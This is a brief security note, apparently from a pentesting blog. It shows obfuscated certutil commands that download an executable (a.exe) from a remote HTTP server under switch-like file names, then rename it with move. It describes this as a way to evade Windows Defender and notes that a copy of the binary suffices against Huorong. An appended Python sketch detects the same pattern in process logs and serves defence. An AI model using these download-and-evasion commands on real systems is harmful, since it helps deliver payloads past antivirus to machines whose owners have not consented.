Conclusion:
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -deleteEccCurve
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -deletePolicyServer
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -deleteEnrollmentServer
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -DeleteHelloContainer
Finally, use the move command to restore the file name:
move -DeleteHelloContainer a.exe
See the article for details.
For Huorong, making a copy is enough; for Windows Defender, obfuscating the command is enough.
https://xz.aliyun.com/t/12503
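
A detection-side sketch for the commands above, added here and not taken from the linked article: it strips the `;,@` prefix and the embedded double quotes from a logged process command line before matching, and reports when the token after the URL (which certutil uses as the output file name) is shaped like a switch. `normalize`, `analyze` and the sample lines are constructed for this example; `original_file_name` is assumed to come from a process-creation log field such as Sysmon's OriginalFileName, and the renamed-copy case assumes the "copy" in the note is a copy of certutil.

```python
import re

_LEADING = re.compile(r'^[\s;,@]+')        # the ";,@" prefix used on this page
_URL = re.compile(r'^https?://\S+$')

def normalize(cmdline):
    """Lower-case the command line, drop the prefix and embedded double quotes."""
    return _LEADING.sub('', cmdline).replace('"', '').lower()

def analyze(cmdline, original_file_name=None):
    """Classify one logged command line; original_file_name is the PE metadata name."""
    tokens = normalize(cmdline).split()
    if not tokens:
        return {'download': False, 'output_name': None, 'output_looks_like_switch': False}
    image = tokens[0].replace('/', '\\').rsplit('\\', 1)[-1]
    # Prefer the PE OriginalFileName so a renamed copy of the binary is still recognised.
    identity = (original_file_name or image).lower()
    is_certutil = identity in ('certutil', 'certutil.exe')
    args = tokens[1:]
    url_idx = next((i for i, t in enumerate(args) if _URL.match(t)), None)
    switches = {t.lstrip('-/') for t in args[:url_idx] if t[:1] in '-/'}
    download = is_certutil and 'urlcache' in switches and url_idx is not None
    # Whatever follows the URL is the output file name, even if it starts with "-".
    out = args[url_idx + 1] if download and url_idx + 1 < len(args) else None
    return {
        'download': download,
        'output_name': out,
        'output_looks_like_switch': bool(out) and out.startswith('-'),
    }

# Constructed sample log lines (address placeholder as written on this page).
SAMPLES = [
    (';,@certutil -u""r""l""c""a""c""h""e"" -split -f '
     'http://192.168.xx.xx:7000/a.exe -DeleteHelloContainer', None),
    ('c.exe -urlcache -split -f http://192.168.xx.xx:7000/a.exe a.exe', 'CertUtil.exe'),
    ('certutil -hashfile a.exe SHA256', None),
]

if __name__ == '__main__':
    for line, ofn in SAMPLES:
        print(analyze(line, ofn), '<-', line)
```

A follow-on rule can pair a hit that has `output_looks_like_switch` set with a later `move` or `ren` of that same file name to an executable extension.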